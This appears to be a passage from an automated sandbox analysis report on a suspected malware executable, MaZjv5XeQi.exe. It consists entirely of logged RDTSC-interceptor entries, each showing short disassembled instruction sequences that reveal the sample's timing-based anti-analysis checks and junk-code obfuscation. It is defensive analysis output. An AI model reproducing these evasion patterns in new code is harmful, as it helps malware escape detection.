                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11A09 second address: C11A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11E2A second address: C11E2F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12405 second address: C12419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FEB1C7EA9DAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12419 second address: C12439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEB1CC19F87h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12725 second address: C1272A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12E55 second address: C12E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C12E59 second address: C12E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11395 second address: C11399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C11399 second address: C113BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FEB1C7EA9DCh 0x0000000f jnp 00007FEB1C7EA9D6h 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C113BD second address: C113CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEB1CC19F76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C113CC second address: C113D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C113D0 second address: C113ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007FEB1CC19F76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C1AA60 second address: C1AA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C1A78E second address: C1A798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEB1CC19F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C1A798 second address: C1A7DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEB1C7EA9D6h 0x00000008 jmp 00007FEB1C7EA9E4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FEB1C7EA9DFh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jp 00007FEB1C7EA9D6h 0x0000001d jmp 00007FEB1C7EA9DBh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C289CD second address: C289F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEB1CC19F76h 0x0000000a jmp 00007FEB1CC19F88h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C2AC1A second address: C2AC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C2AC1E second address: C2AC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FEB1CC19F7Ch 0x0000000e pop edi 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jno 00007FEB1CC19F76h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3448B second address: C34495 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C34495 second address: C344A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEB1CC19F76h 0x0000000a jo 00007FEB1CC19F76h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C344A5 second address: C344A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C344A9 second address: C344FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1CC19F81h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEB1CC19F7Dh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEB1CC19F82h 0x00000019 pushad 0x0000001a jmp 00007FEB1CC19F83h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C344FB second address: C34501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C34501 second address: C34506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C34506 second address: C3450E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3450E second address: C34512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3BDD1 second address: C3BE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jp 00007FEB1C7EA9D6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FEB1C7EA9E7h 0x00000015 jnc 00007FEB1C7EA9D6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jnp 00007FEB1C7EA9D6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3BE0D second address: C3BE21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3F2B3 second address: C3F2DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jbe 00007FEB1C7EA9FEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FEB1C7EA9E2h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C3F2DA second address: C3F2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C45C4F second address: C45C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 jmp 00007FEB1C7EA9E0h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jmp 00007FEB1C7EA9E6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FEB1C7EA9E4h 0x0000001c popad 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C443AF second address: C443D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEB1CC19F7Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C443D7 second address: C443F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FEB1C7EA9D6h 0x0000000d jmp 00007FEB1C7EA9DCh 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C443F4 second address: C44423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jmp 00007FEB1CC19F89h 0x00000013 jns 00007FEB1CC19F76h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44582 second address: C44586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44860 second address: C4486D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jnp 00007FEB1CC19F76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C4486D second address: C44891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FEB1C7EA9E6h 0x0000000b jno 00007FEB1C7EA9D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B41 second address: C44B47 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B47 second address: C44B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B53 second address: C44B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B57 second address: C44B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b js 00007FEB1C7EA9D6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEB1C7EA9E4h 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B85 second address: C44B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44B95 second address: C44BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEB1C7EA9E7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C44E54 second address: C44E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C48FB3 second address: C48FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C490E4 second address: C490F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C490F0 second address: C490FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C490FA second address: C49103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C49103 second address: C4912A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEB1C7EA9E9h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C5ABB5 second address: C5ABC6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1CC19F7Ch 0x00000008 je 00007FEB1CC19F76h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53B69 second address: C53B71 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53B71 second address: C53B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53B76 second address: C53BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FEB1C7EAA0Ah 0x00000012 pushad 0x00000013 jmp 00007FEB1C7EA9E6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnp 00007FEB1C7EA9D6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C53BBC second address: C53BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C6A3D4 second address: C6A3F7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FEB1C7EA9E9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C6A3F7 second address: C6A41B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEB1CC19F8Ah 0x00000008 jmp 00007FEB1CC19F84h 0x0000000d jbe 00007FEB1CC19F82h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C80C5C second address: C80C71 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEB1C7EA9DEh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C7FB45 second address: C7FB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C7FF6E second address: C7FF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEB1C7EA9E5h 0x0000000b popad 0x0000000c jl 00007FEB1C7EA9DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C800D7 second address: C80104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 je 00007FEB1CC19F76h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEB1CC19F87h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C80104 second address: C80108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C8365C second address: C83660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C83B5B second address: C83C23 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEB1C7EA9E4h 0x00000008 jmp 00007FEB1C7EA9DEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 call 00007FEB1C7EA9DEh 0x00000015 mov edx, dword ptr [ebp+122D3588h] 0x0000001b pop edx 0x0000001c mov dx, 512Ch 0x00000020 push dword ptr [ebp+1244BD7Dh] 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007FEB1C7EA9D8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D3119h], edi 0x00000046 call 00007FEB1C7EA9D9h 0x0000004b jg 00007FEB1C7EA9DAh 0x00000051 push eax 0x00000052 jng 00007FEB1C7EA9EFh 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b jmp 00007FEB1C7EA9E5h 0x00000060 popad 0x00000061 mov eax, dword ptr [esp+04h] 0x00000065 jmp 00007FEB1C7EA9E1h 0x0000006a mov eax, dword ptr [eax] 0x0000006c jmp 00007FEB1C7EA9E6h 0x00000071 mov dword ptr [esp+04h], eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C83C23 second address: C83C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C83C27 second address: C83C31 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C84DD0 second address: C84E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FEB1CC19F76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c js 00007FEB1CC19F87h 0x00000012 jmp 00007FEB1CC19F81h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c jbe 00007FEB1CC19F76h 0x00000022 je 00007FEB1CC19F76h 0x00000028 pop eax 0x00000029 push esi 0x0000002a jg 00007FEB1CC19F76h 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C86B3E second address: C86B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA13B7 second address: BA13CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007FEB1CC19F82h 0x0000000e js 00007FEB1CC19F7Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0787 second address: 4DF078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF078D second address: 4DF0791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0791 second address: 4DF07D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FEB1C7EA9DEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FEB1C7EA9DDh 0x0000001c jmp 00007FEB1C7EA9DBh 0x00000021 popfd 0x00000022 mov ecx, 536CC86Fh 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF07D8 second address: 4DF07E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF07E0 second address: 4DF0860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 jmp 00007FEB1C7EA9E8h 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEB1C7EA9E1h 0x00000015 jmp 00007FEB1C7EA9DBh 0x0000001a popfd 0x0000001b mov di, cx 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FEB1C7EA9E7h 0x00000029 or ah, 0000006Eh 0x0000002c jmp 00007FEB1C7EA9E9h 0x00000031 popfd 0x00000032 mov ah, D8h 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0860 second address: 4DF0874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, EFEFh 0x00000007 mov bx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx esi, di 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0874 second address: 4DF08B5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1C7EA9DFh 0x00000008 sbb ecx, 13E3B22Eh 0x0000000e jmp 00007FEB1C7EA9E9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx esi, dx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c movzx ecx, dx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF08B5 second address: 4DF08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF08B9 second address: 4DF0924 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 3E54h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a jmp 00007FEB1C7EA9E3h 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 jmp 00007FEB1C7EA9E6h 0x00000017 nop 0x00000018 jmp 00007FEB1C7EA9E0h 0x0000001d push eax 0x0000001e jmp 00007FEB1C7EA9DBh 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FEB1C7EA9E5h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0A4B second address: 4DF0A73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEB1CC19F85h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DF0A73 second address: 4DF0A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
